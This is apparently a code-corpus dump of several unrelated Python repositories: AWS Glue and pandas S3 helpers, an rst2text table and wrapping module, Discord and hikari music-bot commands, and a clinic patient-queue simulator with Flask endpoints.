Parse Arguments supplied to the Job.
Parameters
----------
arguments
Sequence of options and values to be parsed. (sys.argv)
options
Options which value is resolved.
Returns
-------
Parsed options and values.
"""
LOGGER.debug("Parsing arguments for PySpark job")
from awsglue.utils import getResolvedOptions
LOGGER.debug("Parsing arguments: %s options: %s", arguments, options)
if not options:
return getResolvedOptions(args=arguments, options=["JOB_NAME"])
return getResolvedOptions(arguments, options=["JOB_NAME"] + options)
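# Minimal usage sketch (the option names below are illustrative assumptions):
#   import sys
#   args = get_glue_args(sys.argv, options=["S3_BUCKET", "s3_raw_prefix"])
#   bucket = args["S3_BUCKET"]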
def get_spark_session_and_glue_job(
glue_args: Dict,
conf=None,
py_files: Iterable[str] = None,
extra_jars: List[str] = None,
):
"""
Get spark session and AWS glue job.
Parameters
----------
glue_args
Dictionary of Argument Name: Argument value
extra_jars
Path to dependent jar files
conf : Union[pyspark.SparkConf, Dict[str, str]]
Spark config, either object or dictionary of config options.
py_files
Paths to python files (.py, .zip, .egg)
Returns
-------
pyspark.sql.SparkSession, awsglue.job.Job
"""
from awsglue.context import GlueContext
from awsglue.job import Job
from pyspark import SparkContext, SparkConf
LOGGER.debug("Creating spark session with parameters")
LOGGER.debug("conf=%s", conf)
LOGGER.debug("py_files=%s", py_files)
LOGGER.debug("extra_jars=%s", extra_jars)
if isinstance(conf, dict):
spark_conf = SparkConf()
spark_conf.setAll(conf.items())
elif isinstance(conf, SparkConf):
spark_conf = conf
else:
spark_conf = None
if extra_jars and spark_conf:
spark_dependencies = ",".join(extra_jars)
spark_conf.set("spark.jars.packages", spark_dependencies)
sc = SparkContext.getOrCreate(conf=spark_conf)
if py_files:
LOGGER.debug("Adding PYFILEs: %s", py_files)
for py_file in py_files:
sc.addPyFile(py_file)
glue_context = GlueContext(sparkContext=sc)
job = Job(glue_context=glue_context)
job.init(glue_args["JOB_NAME"], glue_args)
# .py, .zip or .egg
return glue_context.spark_session, job
def commit_job(job):
"""Commit AWS glue job."""
job.commit()
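# Hedged end-to-end sketch of combining these helpers inside a Glue job script
# (config keys and values are illustrative assumptions):
#   import sys
#   glue_args = get_glue_args(sys.argv, options=["S3_BUCKET"])
#   spark, job = get_spark_session_and_glue_job(
#       glue_args, conf={"spark.sql.shuffle.partitions": "8"}
#   )
#   # ... run transformations with `spark` ...
#   commit_job(job)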
```
#### File: src/glue_shared/helpers.py
```python
import os
import re
from functools import partial
from itertools import islice
from typing import Tuple
EXTENSIONS = re.compile(r".+py$|.+zip$|.+egg$")
def take(n, iterable):
"""
Return first n items of the iterable as a list
Notes
-----
From itertools recipes:
https://docs.python.org/3.6/library/itertools.html#itertools-recipes
"""
return list(islice(iterable, n))
def chunked(iterable, n):
"""Break *iterable* into lists of length *n*:
>>> list(chunked([1, 2, 3, 4, 5, 6], 3))
[[1, 2, 3], [4, 5, 6]]
If the length of *iterable* is not evenly divisible by *n*, the last
returned list will be shorter:
>>> list(chunked([1, 2, 3, 4, 5, 6, 7, 8], 3))
[[1, 2, 3], [4, 5, 6], [7, 8]]
To use a fill-in value instead, see the :func:`grouper` recipe.
:func:`chunked` is useful for splitting up a computation on a large number
of keys into batches, to be pickled and sent off to worker processes. One
example is operations on rows in MySQL, which does not implement
server-side cursors properly and would otherwise load the entire dataset
into RAM on the client.
Notes
-----
Reimplemented from more itertools to avoid the installation of the package.
https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.chunked
"""
return iter(partial(take, n, iter(iterable)), [])
def get_py_zip_egg_files(path: str) -> Tuple[str, ...]:
"""
Find all .py, .zip, .egg files in sys.path.
This method is a workaround needed for Glue2.0 as of 2020-05-11
"""
return tuple(e.path for e in filter(lambda ent: EXTENSIONS.match(ent.name), os.scandir(path)))
```
#### File: src/glue_shared/pandas_helpers.py
```python
import logging
from typing import List
import pandas as pd
from glue_shared.boto3_helpers import get_s3_keys
LOGGER = logging.getLogger(__name__)
def write_parquet(
df: pd.DataFrame,
s3_folder_url: str,
partition_cols: List[str] = None,
compression: str = None,
):
"""
Write Parquet file to S3 folder.
Parameters
----------
df
Pandas dataframe
s3_folder_url
S3 url: s3://<bucket>/<prefix>.
partition_cols
Partition path by columns
compression
Parquet compression. Default is "snappy"
"""
import pyarrow as pa
import pyarrow.parquet as pq
import s3fs
LOGGER.info("Writing parquet file to S3: %s", f"{s3_folder_url}")
table = pa.Table.from_pandas(df, preserve_index=False)
pq.write_to_dataset(
table,
s3_folder_url,
filesystem=s3fs.S3FileSystem(),
partition_cols=partition_cols,
compression=compression or "snappy",
)
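# Usage sketch (bucket, prefix and column names are placeholders):
#   write_parquet(df, "s3://my-bucket/refined/", partition_cols=["year"], compression="snappy")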
def df_from_s3_json(
s3_client,
bucket_name: str,
prefix: str,
compression: str = None,
lines: bool = True,
):
"""
Create Pandas DataFrame from multiple files in S3 prefix.
Parameters
----------
s3_client
boto3.client('s3')
bucket_name
prefix
compression
Json file compression.
lines
Multiple JSON objects per line.
Returns
-------
pd.DataFrame
Dataframe containing data under S3 prefix.
"""
df_merged = pd.DataFrame()
for key in get_s3_keys(s3_client, bucket_name, prefix):
resp = s3_client.get_object(Bucket=bucket_name, Key=key)
df = pd.read_json(resp["Body"], orient="records", lines=lines, compression=compression)
df_merged = df_merged.append(df, ignore_index=True)
return df_merged
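# Usage sketch (bucket/prefix are placeholders; assumes gzipped JSON-lines objects):
#   import boto3
#   s3 = boto3.client("s3")
#   df = df_from_s3_json(s3, "my-bucket", "raw/events/", compression="gzip", lines=True)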
```
#### File: glue_shared_lib/tests/test_helpers.py
```python
def test_chunked():
from glue_shared.helpers import chunked
l1 = [x for x in range(10)]
l2 = [x for x in range(12)]
assert tuple(chunked(l1, 3)) == ([0, 1, 2], [3, 4, 5], [6, 7, 8], [9])
assert tuple(chunked(l1, 5)) == ([0, 1, 2, 3, 4], [5, 6, 7, 8, 9])
assert tuple(chunked(l1, 10)) == ([0, 1, 2, 3, 4, 5, 6, 7, 8, 9],)
assert tuple(chunked(l2, 3)) == ([0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11])
assert tuple(chunked(l2, 10)) == ([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11])
``` |
{
"source": "1oglop1/rst2text",
"score": 3
} |
#### File: src/rst2text/elements.py
```python
import math
import re
import textwrap
from itertools import chain, groupby
from typing import cast
from docutils import writers
from docutils.utils import column_width
from rst2text import MAXWIDTH
class Cell:
"""Represents a cell in a table.
It can span on multiple columns or on multiple lines.
"""
def __init__(self, text="", rowspan=1, colspan=1):
self.text = text
self.wrapped = [] # type: List[str]
self.rowspan = rowspan
self.colspan = colspan
self.col = None
self.row = None
def __repr__(self):
return "<Cell {!r} {}v{}/{}>{}>".format(
self.text, self.row, self.rowspan, self.col, self.colspan
)
def __hash__(self):
return hash((self.col, self.row))
def wrap(self, width):
self.wrapped = my_wrap(self.text, width)
class Table:
"""Represents a table, handling cells that can span on multiple lines
or rows, like::
+-----------+-----+
| AAA | BBB |
+-----+-----+ |
| | XXX | |
| +-----+-----+
| DDD | CCC |
+-----+-----------+
This class can be used in two ways:
- Either with absolute positions: call ``table[line, col] = Cell(...)``,
      this overwrites an existing cell if any.
- Either with relative positions: call the ``add_row()`` and
``add_cell(Cell(...))`` as needed.
    Cells spanning multiple rows or multiple columns (having a
    colspan or rowspan greater than one) are automatically referenced
    by all the table cells they cover. This is a useful
representation as we can simply check ``if self[x, y] is self[x,
y+1]`` to recognize a rowspan.
    Colwidth is not automatically computed; it has to be given, either
    at construction time or during the table construction.
Example usage::
table = Table([6, 6])
table.add_cell(Cell("foo"))
table.add_cell(Cell("bar"))
table.set_separator()
table.add_row()
table.add_cell(Cell("FOO"))
table.add_cell(Cell("BAR"))
print(table)
+--------+--------+
| foo | bar |
|========|========|
| FOO | BAR |
+--------+--------+
"""
def __init__(self, colwidth=None):
self.lines = [] # type: List[List[Cell]]
self.separator = 0
self.colwidth = colwidth if colwidth is not None else [] # type: List[int]
self.current_line = 0
self.current_col = 0
def add_row(self):
"""Add a row to the table, to use with ``add_cell()``. It is not needed
to call ``add_row()`` before the first ``add_cell()``.
"""
self.current_line += 1
self.current_col = 0
def set_separator(self):
"""Sets the separator below the current line.
"""
self.separator = len(self.lines)
def add_cell(self, cell):
"""Add a cell to the current line, to use with ``add_row()``. To add
a cell spanning on multiple lines or rows, simply set the
``cell.colspan`` or ``cell.rowspan`` BEFORE inserting it to
the table.
"""
while self[self.current_line, self.current_col]:
self.current_col += 1
self[self.current_line, self.current_col] = cell
self.current_col += cell.colspan
def __getitem__(self, pos):
line, col = pos
self._ensure_has_line(line + 1)
self._ensure_has_column(col + 1)
return self.lines[line][col]
def __setitem__(self, pos, cell):
line, col = pos
self._ensure_has_line(line + cell.rowspan)
self._ensure_has_column(col + cell.colspan)
for dline in range(cell.rowspan):
for dcol in range(cell.colspan):
self.lines[line + dline][col + dcol] = cell
cell.row = line
cell.col = col
def _ensure_has_line(self, line):
while len(self.lines) < line:
self.lines.append([])
def _ensure_has_column(self, col):
for line in self.lines:
while len(line) < col:
line.append(None)
def __repr__(self):
return "\n".join(repr(line) for line in self.lines)
def cell_width(self, cell, source):
"""Give the cell width, according to the given source (either
``self.colwidth`` or ``self.measured_widths``).
        This takes into account cells spanning multiple columns.
"""
width = 0
for i in range(self[cell.row, cell.col].colspan):
width += source[cell.col + i]
return width + (cell.colspan - 1) * 3
@property
def cells(self):
seen = set() # type: Set[Cell]
for lineno, line in enumerate(self.lines):
for colno, cell in enumerate(line):
if cell and cell not in seen:
yield cell
seen.add(cell)
def rewrap(self):
"""Call ``cell.wrap()`` on all cells, and measure each column width
after wrapping (result written in ``self.measured_widths``).
"""
self.measured_widths = self.colwidth[:]
for cell in self.cells:
cell.wrap(width=self.cell_width(cell, self.colwidth))
if not cell.wrapped:
continue
width = math.ceil(max(column_width(x) for x in cell.wrapped) / cell.colspan)
for col in range(cell.col, cell.col + cell.colspan):
self.measured_widths[col] = max(self.measured_widths[col], width)
def physical_lines_for_line(self, line):
"""From a given line, compute the number of physical lines it spans
due to text wrapping.
"""
physical_lines = 1
for cell in line:
physical_lines = max(physical_lines, len(cell.wrapped))
return physical_lines
def __str__(self):
out = []
self.rewrap()
def writesep(char="-", lineno=None):
# type: (str, Optional[int]) -> str
"""Called on the line *before* lineno.
Called with no *lineno* for the last sep.
"""
out = [] # type: List[str]
for colno, width in enumerate(self.measured_widths):
if (
lineno is not None
and lineno > 0
and self[lineno, colno] is self[lineno - 1, colno]
):
out.append(" " * (width + 2))
else:
out.append(char * (width + 2))
head = "+" if out[0][0] == "-" else "|"
tail = "+" if out[-1][0] == "-" else "|"
glue = [
"+" if left[0] == "-" or right[0] == "-" else "|"
for left, right in zip(out, out[1:])
]
glue.append(tail)
return head + "".join(chain(*zip(out, glue)))
for lineno, line in enumerate(self.lines):
if self.separator and lineno == self.separator:
out.append(writesep("=", lineno))
else:
out.append(writesep("-", lineno))
for physical_line in range(self.physical_lines_for_line(line)):
linestr = ["|"]
for colno, cell in enumerate(line):
if cell.col != colno:
continue
if lineno != cell.row:
physical_text = ""
elif physical_line >= len(cell.wrapped):
physical_text = ""
else:
physical_text = cell.wrapped[physical_line]
adjust_len = len(physical_text) - column_width(physical_text)
linestr.append(
" "
+ physical_text.ljust(
self.cell_width(cell, self.measured_widths) + 1 + adjust_len
)
+ "|"
)
out.append("".join(linestr))
out.append(writesep("-"))
return "\n".join(out)
class TextWrapper(textwrap.TextWrapper):
"""Custom subclass that uses a different word separator regex."""
wordsep_re = re.compile(
r"(\s+|" # any whitespace
r"(?<=\s)(?::[a-z-]+:)?`\S+|" # interpreted text start
r"[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|" # hyphenated words
r"(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))"
) # em-dash
def _wrap_chunks(self, chunks):
# type: (List[str]) -> List[str]
"""_wrap_chunks(chunks : [string]) -> [string]
The original _wrap_chunks uses len() to calculate width.
This method respects wide/fullwidth characters for width adjustment.
"""
lines = [] # type: List[str]
if self.width <= 0:
raise ValueError("invalid width %r (must be > 0)" % self.width)
chunks.reverse()
while chunks:
cur_line = []
cur_len = 0
if lines:
indent = self.subsequent_indent
else:
indent = self.initial_indent
width = self.width - column_width(indent)
if self.drop_whitespace and chunks[-1].strip() == "" and lines:
del chunks[-1]
while chunks:
l = column_width(chunks[-1])
if cur_len + l <= width:
cur_line.append(chunks.pop())
cur_len += l
else:
break
if chunks and column_width(chunks[-1]) > width:
self._handle_long_word(chunks, cur_line, cur_len, width)
if self.drop_whitespace and cur_line and cur_line[-1].strip() == "":
del cur_line[-1]
if cur_line:
lines.append(indent + "".join(cur_line))
return lines
def _break_word(self, word, space_left):
# type: (str, int) -> Tuple[str, str]
"""_break_word(word : string, space_left : int) -> (string, string)
Break line by unicode width instead of len(word).
"""
total = 0
for i, c in enumerate(word):
total += column_width(c)
if total > space_left:
return word[: i - 1], word[i - 1 :]
return word, ""
def _split(self, text):
# type: (str) -> List[str]
"""_split(text : string) -> [string]
Override original method that only split by 'wordsep_re'.
This '_split' split wide-characters into chunk by one character.
"""
def split(t):
# type: (str) -> List[str]
return super(TextWrapper, self)._split(t)
chunks = [] # type: List[str]
for chunk in split(text):
for w, g in groupby(chunk, column_width):
if w == 1:
chunks.extend(split("".join(g)))
else:
chunks.extend(list(g))
return chunks
def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
# type: (List[str], List[str], int, int) -> None
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Override original method for using self._break_word() instead of slice.
"""
space_left = max(width - cur_len, 1)
if self.break_long_words:
l, r = self._break_word(reversed_chunks[-1], space_left)
cur_line.append(l)
reversed_chunks[-1] = r
elif not cur_line:
cur_line.append(reversed_chunks.pop())
def my_wrap(text, width=MAXWIDTH, **kwargs):
# type: (str, int, Any) -> List[str]
w = TextWrapper(width=width, **kwargs)
return w.wrap(text)
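# Small illustration (the exact split is indicative only):
#   my_wrap("a fairly long sentence that needs wrapping", width=20)
#   # -> ['a fairly long', 'sentence that needs', 'wrapping']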
```
#### File: src/rst2text/writers.py
```python
from docutils.writers import html4css1, Writer
from rst2text.translators import TextTranslator
from flask_rstpages.parsers import HTMLTranslator
from typing import Iterable, cast
class HTMLWriter(html4css1.Writer):
"""Subclass the html4css1.Writer to redefine the translator_class"""
def __init__(self):
# html4css1.writers.Writer.__init__(self)
super().__init__()
self.translator_class = HTMLTranslator
class TextWriter(Writer):
supported = ("text",)
settings_spec = ("No options here.", "", ())
settings_defaults = {} # type: Dict
output = None # type: str
def __init__(self):
        # type: () -> None
super().__init__()
# self.document = document
self.translator_class = TextTranslator
def translate(self):
# type: () -> None
visitor = TextTranslator(self.document)
self.document.walkabout(visitor)
self.output = cast(TextTranslator, visitor).body
``` |
{
"source": "1olipop/Axley",
"score": 2
} |
#### File: axley/cogs/gateway.py
```python
from discord.ext import commands
class Gateway(commands.Cog):
def __init__(self, bot):
self.bot = bot
db = self.bot.db()
self.collection = db["gateway"]
def setup(bot):
bot.add_cog(Gateway(bot))
```
#### File: Axley/axley/__main__.py
```python
from axley.core.bot import Axley
from discord_slash import SlashCommand
def main() -> None:
try:
import uvloop
uvloop.install()
except Exception as e:
raise e
bot = Axley()
SlashCommand(bot, sync_commands = True)
bot.run()
if __name__ == "__main__":
main()
``` |
{
"source": "1olipop/nezuko",
"score": 2
} |
#### File: nezukari/components/join.py
```python
import tanjun
join_component = tanjun.Component()
async def _join(ctx: tanjun.abc.Context) -> int:
states = ctx.shards.cache.get_voice_states_view_for_guild(ctx.get_guild())
voice_state = list(filter(lambda i: i.user_id == ctx.author.id, states.iterator()))
if not voice_state:
await ctx.respond("Connect to a voice channel first")
return 0
channel_id = voice_state[0].channel_id
try:
connection_info = await ctx.shards.data.lavalink.join(ctx.guild_id, channel_id)
except TimeoutError:
await ctx.respond(
"I was unable to connect to the voice channel, maybe missing permissions? or some internal issue."
)
return 0
await ctx.shards.data.lavalink.create_session(connection_info)
return channel_id
@join_component.with_slash_command
@tanjun.as_slash_command("join", "Join's a voice channel")
async def join(ctx: tanjun.abc.Context) -> None:
channel_id = await _join(ctx)
if channel_id:
await ctx.respond(f"Joined <#{channel_id}>")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(join_component.copy())
```
#### File: nezukari/components/nowplaying.py
```python
import tanjun
import hikari
from typing import Union
nowplaying_component = tanjun.Component()
@nowplaying_component.with_slash_command
@tanjun.as_slash_command("nowplaying", "Show's the song that is being played right now")
async def nowplaying(ctx: tanjun.abc.Context) -> Union[hikari.Message, None]:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
em = hikari.Embed(
title="Now playing",
description=f"[{node.now_playing.track.info.title}]({node.now_playing.track.info.uri})",
)
await ctx.respond(embed=em)
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(nowplaying_component.copy())
```
#### File: nezukari/components/pause.py
```python
import tanjun
import hikari
from typing import Union
pause_component = tanjun.Component()
@pause_component.with_slash_command
@tanjun.as_slash_command("pause", "Pause the current song being played")
async def pause(ctx: tanjun.abc.Context) -> Union[hikari.Message, None]:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if node.is_paused:
return await ctx.respond("The songs are currently paused")
await ctx.shards.data.lavalink.pause(ctx.guild_id)
await ctx.shards.data.lavalink.set_pause(ctx.guild_id, True)
await ctx.respond("Paused successfully")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(pause_component.copy())
```
#### File: nezukari/components/resume.py
```python
import tanjun
resume_component = tanjun.Component()
@resume_component.with_slash_command
@tanjun.as_slash_command("resume", "Resume the song that is paused")
async def resume(ctx: tanjun.abc.Context) -> None:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if node.is_paused:
await ctx.shards.data.lavalink.resume(ctx.guild_id)
await ctx.respond("Resumed successfully")
else:
await ctx.respond("It's already resumed >:(")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(resume_component.copy())
```
#### File: nezukari/components/volume.py
```python
import tanjun
volume_component = tanjun.Component()
@volume_component.with_slash_command
@tanjun.with_int_slash_option("volume", "Volume to be set (Between 0 and 100)")
@tanjun.as_slash_command("volume", "Increase/Decrease the volume")
async def volume(ctx: tanjun.abc.Context, volume: int) -> None:
node = await ctx.shards.data.lavalink.get_guild_node(ctx.guild_id)
if not node or not node.now_playing:
return await ctx.respond("Nothing is being played at the moment")
if 0 < volume < 100:
await ctx.shards.data.lavalink.volume(ctx.guild_id, volume)
await ctx.respond(f"Set the volume to {volume}")
else:
await ctx.respond("Volume should be between 0 and 100")
@tanjun.as_loader
def load(client: tanjun.Client) -> None:
client.add_component(volume_component.copy())
``` |
{
"source": "1orange/queue-system-api",
"score": 3
} |
#### File: 1orange/queue-system-api/simulator_old.py
```python
from typing import List, Tuple
import pendulum
import simpy
from pyparsing import line
from smart_queue.analysis import CONDITION_TABLE, CONFIGURATION_PATH
from smart_queue.analysis.classes.Patient import Patient
from smart_queue.analysis.classes.store import PriorityBaseStore
class Queue(object):
def __init__(self, env, ambulance, configuration_id, eval_type) -> None:
self.env = env
self.patients = self.load_configuration(
configuration_id=configuration_id
)
self.ambulance = ambulance
self.current_patient = self.patients.pop(0)
self.type = eval_type
self.current_waiting_time = 0
self.action = self.run()
def eval_priority(self, patient):
# NOTE: Original algorithm is @ smart_queue.db.database
if self.type == 1:
duration = (
pendulum.from_timestamp(self.env.now).timestamp()
- pendulum.parse(patient.time_arrived).timestamp()
)
if duration > 0:
return -(
(duration * patient.condition_urgency) / patient.burst_time
)
return 9999
return 999
def reevaluate_queue(self):
queue = self.patients
for patient in queue:
patient.priority = self.eval_priority(patient)
yield patient.update_request_priority(self.ambulance)
queue = sorted(queue, key=lambda x: (x.priority, x.time_arrived))
self.patients = queue
def get_next_patient(self):
new_waiting_time = (
self.current_waiting_time - self.current_patient.burst_time
)
if new_waiting_time >= 0:
self.current_waiting_time = new_waiting_time
self.reevaluate_queue()
self.current_patient = self.patients.pop(0)
def fill_store(self):
for patient in self.patients:
self.env.process(
self.client(
f"Patient {patient.id}",
self.ambulance,
patient,
procedure_time=patient.burst_time,
),
)
def run(self):
self.fill_store()
self.env.run()
def client(self, name, ambulance, patient, procedure_time):
current_time = pendulum.from_timestamp(self.env.now).timestamp()
arrive_time = pendulum.parse(patient.time_arrived).timestamp()
time_delta = arrive_time - current_time
# Wait till time is actually arive time
if time_delta > 0:
yield self.env.timeout(time_delta)
# while self.current_patient != patient:
# self.env.step()
self.reevaluate_queue()
print(
f"{name} - Arrived @ {pendulum.from_timestamp(self.env.now).to_time_string()}"
)
with ambulance.request(priority=patient.priority) as req:
# patient.req = ambulance.request(priority=-patient.priority)
patient.req = req
yield patient.req
try:
wait = (
self.env.now
- pendulum.parse(patient.time_arrived).timestamp()
)
print(f"{name} - Inside (Waited for {round(wait/60, 3)} min)")
self.current_waiting_time += procedure_time
yield self.env.timeout(procedure_time * 60)
self.get_next_patient()
print(
f"{name} - Out @ {pendulum.from_timestamp(self.env.now).to_time_string()}"
)
except simpy.Interrupt as interrupt:
by = interrupt.cause.by
                usage = self.env.now - interrupt.cause.usage_since
                print(
                    f"{name} got preempted by {by} at {self.env.now}"
f" after {usage}"
)
def load_configuration(self, configuration_id: int) -> List[Patient]:
with open(
file=f"{CONFIGURATION_PATH}/configuration_{configuration_id}",
# file=f"{CONFIGURATION_PATH}/example",
mode="r",
encoding="utf-8",
) as file:
patients = []
for pat_id, line in enumerate(file):
condition, arrival_time = self._parse_configuration_line(line)
patients.append(
Patient(pat_id, CONDITION_TABLE[condition], arrival_time)
)
return patients
def _parse_configuration_line(self, line_raw: str) -> Tuple[str, str]:
line = line_raw.split()
condition = line[0].strip()
arrival_time = line[1].strip()
return condition, arrival_time
if __name__ == "__main__":
env = simpy.Environment(
initial_time=pendulum.parse("08:00:00").timestamp(),
)
ambulance = simpy.PriorityResource(env, capacity=1)
queue = Queue(env, ambulance, 2, 1)
```
#### File: analysis/classes/Queue.py
```python
import statistics
from typing import List, Tuple
import pendulum
from smart_queue.analysis import CONDITION_TABLE, CONFIGURATION_PATH
from smart_queue.analysis.classes.Patient import Patient
class Queue:
def __init__(self, open_time, close_time, iter_data=None, naive=True):
self.open_time = pendulum.parse(open_time)
self.close_time = pendulum.parse(close_time)
self.naive = naive
self.configuration = iter_data
self.current_patient = None
self.current_time = self.open_time
self.patient_to_arrive = self.configuration.pop(0)
self.queue = []
self.served = []
def set_configuration(self, iter_data):
self.configuration = iter_data
def simulate(self):
while True:
# Check whether any patient arrived
# If Patient arrived:
# - Add to queue
# - Reevevaluate queue
if self.configuration:
if self.current_time >= self.patient_to_arrive.time_arrived:
# print(
# f"Patient {self.patient_to_arrive.id} - Arrived @ {self.patient_to_arrive.time_arrived.to_time_string()}"
# )
self.queue.append(self.patient_to_arrive)
self.patient_to_arrive = self.configuration.pop(0)
self.reevaluate_queue()
# Check whether patient inside is done
# If patient done:
# - Add patient to served
# - Get new patient
if self.current_patient:
if self.current_time == self.current_patient.time_arrived.add(
minutes=self.current_patient.burst_time
+ self.current_patient.waiting_time
):
self.get_next_patient()
# If no patient inside, try get one
if not self.current_patient and self.queue:
self.current_patient = self.queue.pop(0)
self.current_time = self.current_time.add(seconds=1)
if (
not self.configuration
and not self.queue
and not self.current_patient
):
break
return self.get_median_wait_time_condition()
def get_median_wait_time_condition(self):
# Map conditions
stats_per_condition = {}
for patient in self.served:
if patient.condition in stats_per_condition:
stats_per_condition[patient.condition] += [
patient.waiting_time
]
else:
stats_per_condition[patient.condition] = [patient.waiting_time]
# return {
# condition: statistics.median(values)
# for condition, values in stats_per_condition.items()
# }
return stats_per_condition
def eval_priority(self, patient):
# NOTE: Original algorithm is @ smart_queue.db.database
if not self.naive:
duration = self.current_time - patient.time_arrived
return (duration * patient.condition_urgency) / patient.burst_time
return 1
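    # Worked example of the non-naive formula (treating the elapsed wait as a plain
    # number of minutes purely for illustration): a patient who has waited 30 with
    # condition_urgency 2 and burst_time 10 gets priority (30 * 2) / 10 = 6, so
    # longer waits and higher urgency raise priority, longer procedures lower it.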
def reevaluate_queue(self):
sorted_queue = self.queue
for patient in sorted_queue:
patient.priority = self.eval_priority(patient)
self.queue = sorted(
sorted_queue, key=lambda x: (-x.priority, x.time_arrived)
)
def get_next_patient(self):
# Add to served
self.served.append(self.current_patient)
# print(f"Patient {self.current_patient.id} - Out @ {self.current_time.to_time_string()}")
self.current_patient = None
# Get next patient and update waiting time
if self.queue:
self.current_patient = self.queue.pop(0)
self.current_patient.update_waiting_time(self.current_time)
# print(
# f"Patient {self.current_patient.id} - Inside (Waited for {self.current_patient.waiting_time} min)"
# )
self.reevaluate_queue()
def load_configuration(self, configuration_id: int) -> List[Patient]:
with open(
file=f"{CONFIGURATION_PATH}/configuration_{configuration_id}",
# file=f"{CONFIGURATION_PATH}/example",
mode="r",
encoding="utf-8",
) as file:
patients = []
for pat_id, line in enumerate(file):
condition, arrival_time = self._parse_configuration_line(line)
patients.append(
Patient(pat_id, CONDITION_TABLE[condition], arrival_time)
)
return sorted(patients, key=lambda x: x.time_arrived)
def _parse_configuration_line(self, line_raw: str) -> Tuple[str, str]:
line = line_raw.split()
condition = line[0].strip()
arrival_time = line[1].strip()
return condition, arrival_time
```
#### File: analysis/classes/Stats.py
```python
class ConditionStats:
def __init__(self, max_val, min_val, median, raw_values):
self.max = max_val
self.min = min_val
self.median = median
self.values = raw_values
```
#### File: analysis/classes/store.py
```python
import simpy
from simpy.core import BoundClass
class PriorityGet(simpy.resources.base.Get):
def __init__(self, resource, priority=10, preempt=True):
self.priority = priority
"""The priority of this request. A smaller number means higher
priority."""
self.preempt = preempt
"""Indicates whether the request should preempt a resource user or not
(:class:`PriorityResource` ignores this flag)."""
self.time = resource._env.now
"""The time at which the request was made."""
self.usage_since = None
"""The time at which the request succeeded."""
self.key = (self.priority, self.time, not self.preempt)
"""Key for sorting events. Consists of the priority (lower value is
more important), the time at which the request was made (earlier
requests are more important) and finally the preemption flag (preempt
requests are more important)."""
super().__init__(resource)
class PriorityBaseStore(simpy.resources.store.Store):
GetQueue = simpy.resources.resource.SortedQueue
get = BoundClass(PriorityGet)
```
#### File: apps/conditions/views.py
```python
from http import HTTPStatus
from flask import Response, json, request
from flask_apispec import doc, marshal_with, use_kwargs
from flask_apispec.views import MethodResource
from flask_restful import Resource, reqparse
from smart_queue.apps import InvalidResponseModel
from smart_queue.apps.conditions.models import (
ConditionGETRequestModel,
ConditionGETResponse,
ConditionPOSTRequestModel,
)
from smart_queue.db.database import (
delete_condition,
get_all_conditions,
insert_condition,
)
class ConditionEndpoint(MethodResource, Resource):
"""
    Endpoint related to conditions.
"""
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @marshal_with(ConditionGETResponse)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def get(self):
"""
GET Method - Get all condtions
"""
return Response(
response=json.dumps(
[
{
"id": condition.id,
"name": condition.name,
"description": condition.description,
}
for condition in get_all_conditions()
]
),
status=HTTPStatus.OK,
mimetype="application/json",
)
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @use_kwargs(ConditionPOSTRequestModel)
@marshal_with(ConditionPOSTRequestModel, code=201)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def post(self):
"""
POST Method - Insert new condition
"""
# NOTE: Add JSON validation
try:
name = None
desc = None
burst_time = None
urgency = None
if "name" in request.json:
name = request.json["name"]
if "description" in request.json:
desc = request.json["description"]
if "burst_time" in request.json:
burst_time = request.json["burst_time"]
if "urgency" in request.json:
urgency = request.json["urgency"]
# Add condition
insert_condition(name=name, desc=desc, burst_time=burst_time)
except KeyError:
return Response(
response=json.dumps({"info": "Wrong JSON format."}),
status=HTTPStatus.BAD_REQUEST,
mimetype="application/json",
)
@doc(description="Endpoint used for conditions", tags=["Condition"])
# @use_kwargs(ConditionPOSTRequestModel)
@marshal_with(ConditionPOSTRequestModel, code=201)
@marshal_with(InvalidResponseModel, code=400)
@marshal_with(InvalidResponseModel, code=404)
@marshal_with(InvalidResponseModel, code=422)
@marshal_with(InvalidResponseModel, code=500)
def delete(self):
"""
        Delete Method - Delete a condition
"""
# NOTE: Add JSON validation
try:
id = None
if "id" in request.json:
id = request.json["id"]
# Add condition
delete_condition(id=id)
except KeyError:
return Response(
response=json.dumps({"info": "Wrong JSON format."}),
status=HTTPStatus.BAD_REQUEST,
mimetype="application/json",
)
```
#### File: db/helpers/autocommit.py
```python
import logging
from contextlib import contextmanager
import psycopg2
logger = logging.getLogger(__name__)
@contextmanager
def one_transaction_ctx(connection, autocommit=False):
if connection.autocommit == autocommit:
with connection:
yield connection
return
try:
try:
connection.autocommit = autocommit
except psycopg2.Error as e:
logger.error(f"Failed to change autocommit: {e}")
raise
with connection:
yield connection
finally:
connection.autocommit = not autocommit
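# Hedged usage sketch (connection setup is illustrative):
#   conn = psycopg2.connect(dsn)
#   with one_transaction_ctx(conn, autocommit=False) as tx_conn:
#       with tx_conn.cursor() as cur:
#           cur.execute("SELECT 1")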
```
#### File: queue-system-api/smart_queue/__init__.py
```python
import logging
import logging.config
import os
from typing import Dict
import addict
import yaml
def load_yaml_file(file) -> Dict:
""" Load yaml file and return as dict. """
